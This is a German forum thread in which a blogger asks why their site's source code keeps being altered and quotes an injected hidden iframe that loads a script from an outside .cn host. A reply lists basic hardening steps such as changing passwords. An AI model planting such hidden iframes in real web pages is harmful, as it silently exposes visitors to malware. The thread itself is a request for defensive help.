Seltsame Dinge - Blogsicherheit

• In letzter Zeit wird mein Quelltext seltsamerweise manipuliert. Ich bin mir nicht sicher ob dies vielleicht durch ein Plugin passiert oder ob mein Blog ernsthafte Sicherheitsprobleme hat.
    Erst gestern musste ich ein Backup aufspielen weil eine seltsame Zeile im Quelltext mein Blogdesign zerstörte und heute finde ich beim validieren wieder was:

HTML
    <iframe src="http://thebettings.cn:8080/ts/in.cgi?pepsi54" width=125 height=125 style="visibility: hidden"></iframe>

Was soll ich tun? Wie kann ich solche Zugriffe unterbinden oO ?

• Anzeige

Hallo!

Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

• ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

Mehr erfahren

• * sichere kennwörter ( >= 8 stellen, groß- / kleinbuchstabben, ziffern &/oder sonderzeichen miteinander kombiniert)
    * ftp-kennwort austauschen
    * admin-kennwort austauschen
    * das plugin hier mal ausprobieren
    * bot-trap einbinden

gibt sicherlich noch ein paar zusätzliche sachen, aber das soll für den anfang reichen.....

Feedback ist Wichtig!|FAQ|Rückfragen im Forum!|Wenn ich mal was vergesse.... einfach mal sagen...

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!